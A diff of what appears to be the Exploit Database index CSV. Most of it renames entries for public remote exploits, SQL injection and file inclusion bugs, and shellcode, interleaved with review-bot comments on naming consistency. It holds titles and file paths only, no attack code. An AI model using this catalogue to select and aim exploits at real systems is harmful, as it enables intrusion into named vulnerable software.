3397,platforms/windows/remote/3397.pl,"MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143
3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 < 4.4.6 - PHPinfo() Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0
3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote,0
3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote,0
@ -9544,14 +9550,14 @@ id,file,description,date,author,platform,type,port
5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0
5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Buffer Overflow",2008-02-29,Elazar,windows,remote,0
5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0
5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0
5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0
5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0
5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0
5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0
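Review bot: the updated 5213 row drops the trailing "Exploit" from its title ("Versant Object Database 7.0.1.3 - Commands Execution") while the updated 5224 row in the same hunk keeps it ("'vhcs2_daemon' Remote Root Exploit"); apply the same rule to both. "Commands Execution" also reads awkwardly; "Command Execution" is the form used elsewhere in this file (for example the 40741 row).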
@ -10905,7 +10911,7 @@ id,file,description,date,author,platform,type,port
17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0
17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager - ovwebsnmpsrv.exe ovutil Buffer Overflow (Metasploit)",2011-03-23,Metasploit,windows,remote,0
17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit)",2011-03-25,Metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0
17048,platforms/windows/remote/17048.rb,"VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)",2011-03-26,Metasploit,windows,remote,0
17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0
17058,platforms/linux/remote/17058.rb,"Distributed Ruby - Send instance_eval/syscall Code Execution (Metasploit)",2011-03-27,Metasploit,linux,remote,0
17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0
@ -10928,7 +10934,7 @@ id,file,description,date,author,platform,type,port
17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 (build 2055) - Buffer Overflow",2011-05-04,xsploitedsec,windows,remote,0
17240,platforms/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb and bls",windows,remote,0
17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0
17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote,0
17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI - ActiveX Buffer Overflow (Metasploit)",2011-05-10,Metasploit,windows,remote,0
17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0
@ -11147,7 +11153,7 @@ id,file,description,date,author,platform,type,port
18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0
18812,platforms/windows/remote/18812.rb,"McAfee Virtual Technician MVTControl 6.3.0.1911 - GetObject (Metasploit)",2012-05-01,Metasploit,windows,remote,0
18818,platforms/windows/remote/18818.py,"SolarWinds Storage Manager 5.1.0 - Remote SYSTEM SQL Injection",2012-05-01,muts,windows,remote,0
18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
18825,platforms/windows/remote/18825.rb,"VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)",2012-05-03,Metasploit,windows,remote,0
18834,platforms/php/remote/18834.rb,"PHP - CGI Argument Injection (Metasploit)",2012-05-04,Metasploit,php,remote,0
18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
@ -13788,6 +13794,7 @@ id,file,description,date,author,platform,type,port
31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0
31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0
31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0
40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0
31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555
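Review bot: 40760 (2016-11-15) is inserted between 31163 and 31683 in a block of 2008/2014 entries rather than next to the other new 2016-11 remote entries (40758 and 40767 in the hunk at 15056). If row position carries no meaning this is harmless, but appending new ids at one consistent point keeps later diffs of this file readable.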
@ -15019,7 +15026,7 @@ id,file,description,date,author,platform,type,port
40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@ -15056,13 +15063,14 @@ id,file,description,date,author,platform,type,port
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
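Review bot: the 40758 description carries an unbalanced trailing quote on both the old and the new line, "'Login' Buffer Overflow' (Metasploit)"; since the line is being renamed anyway, drop the stray apostrophe so it reads "'Login' Buffer Overflow (Metasploit)", matching the 40452 description in the hunk at 15019.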
@ -17344,7 +17352,7 @@ id,file,description,date,author,platform,type,port
3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0
3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0
3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Remote / Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0
3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0
3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0
3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0
3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
@ -17625,8 +17633,8 @@ id,file,description,date,author,platform,type,port
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,php,webapps,0
4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,php,webapps,0
4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) SQL Injection",2007-06-28,r00t,php,webapps,0
@ -18354,34 +18362,34 @@ id,file,description,date,author,platform,type,port
5203,platforms/php/webapps/5203.txt,"PHP-Nuke Module My_eGallery 2.7.9 - SQL Injection",2008-02-28,"Aria-Security Team",php,webapps,0
5204,platforms/php/webapps/5204.py,"Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure",2008-02-28,"Julien CAYSSOL",php,webapps,0
5206,platforms/php/webapps/5206.txt,"Dream4 Koobi CMS 4.3.0 < 4.2.3 - 'categ' Parameter SQL Injection",2008-02-29,JosS,php,webapps,0
5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5207,platforms/php/webapps/5207.txt,"Mambo Component com_Musica - 'id' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection",2008-03-01,"SoSo H H",php,webapps,0
5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0
5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0
5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0
5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' SQL Injection",2008-03-06,S@BUN,php,webapps,0
5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' SQL Injection",2008-03-06,S@BUN,php,webapps,0
5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads - 'cid' Parameter SQL Injection",2008-03-06,S@BUN,php,webapps,0
5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin",2008-03-07,"Charles Fol",php,webapps,0
5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Arbitrary File Upload",2008-03-07,"Charles Fol",php,webapps,0
5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - (cID) SQL Injection",2008-03-08,S@BUN,php,webapps,0
5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0
5221,platforms/php/webapps/5221.txt,"Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection",2008-03-08,S@BUN,php,webapps,0
5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - 'qti_usr.php' SQL Injection",2008-03-09,croconile,php,webapps,0
5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0
5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0
5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection",2008-03-10,"Charles Fol",php,webapps,0
5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0
5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0
5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection",2008-03-10,Don,php,webapps,0
5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection",2008-03-10,"Charles Fol",php,webapps,0
5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0
5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - 'gaz' Parameter SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0
5234,platforms/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,php,webapps,0
5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase - 'id' SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0
5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0
5237,platforms/php/webapps/5237.txt,"Joomla! Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0
5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,php,webapps,0
5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps,0
5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0
5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0
5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0
5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection",2008-03-12,S@BUN,php,webapps,0
5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0
5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0
5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0
5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5247,platforms/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0
5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
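Review bot: the 5221 rename changes the parameter's case from (cID) to 'cid'; PHP request parameters are case-sensitive, so the spelling should be taken from 5221.txt rather than normalised to lower case. The hunk is also inconsistent about what to keep when the old description named both a script and a parameter: 5231 keeps only the parameter ('msg_id', dropping archives.php) while 5222 keeps only the script ('qti_usr.php', dropping id). Pick one convention and apply it to both.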
@ -19179,7 +19187,7 @@ id,file,description,date,author,platform,type,port
6249,platforms/php/webapps/6249.txt,"ZeeJobsite 2.0 - (adid) SQL Injection",2008-08-15,"Hussin X",php,webapps,0
6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0
6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0
6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) SQL Injection",2008-08-17,"Hussin X",php,webapps,0
6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' Parameter SQL Injection",2008-08-17,"Hussin X",php,webapps,0
6258,platforms/php/webapps/6258.txt,"PHPBasket - 'product.php pro_id' SQL Injection",2008-08-17,r45c4l,php,webapps,0
6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0
6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0
@ -20605,7 +20613,7 @@ id,file,description,date,author,platform,type,port
8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0
8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0
8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - (entry_id) SQL Injection",2009-03-16,boom3rang,php,webapps,0
8220,platforms/php/webapps/8220.txt,"phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection",2009-03-16,boom3rang,php,webapps,0
8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0
8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
@ -21237,7 +21245,7 @@ id,file,description,date,author,platform,type,port
9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0
9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0
9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0
9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0
@ -22008,7 +22016,7 @@ id,file,description,date,author,platform,type,port
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0
10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
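Review bot: the 10873 rename drops the vendor name "Myiosoft", leaving the entry as a bare "EasyGallery". The index already holds unrelated EasyGallery entries (5247 "EasyGallery 5.0tr" by JosS in the hunk at 18354, and 27708 "EasyGallery 1.17", removed in the hunk at 29116), so the vendor prefix is what disambiguated this one and should stay.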
@ -28846,11 +28854,6 @@ id,file,description,date,author,platform,type,port
27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0
27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - comment.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0
27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - contact.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0
27349,platforms/php/webapps/27349.txt,"phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27350,platforms/php/webapps/27350.txt,"phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27351,platforms/php/webapps/27351.txt,"phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0
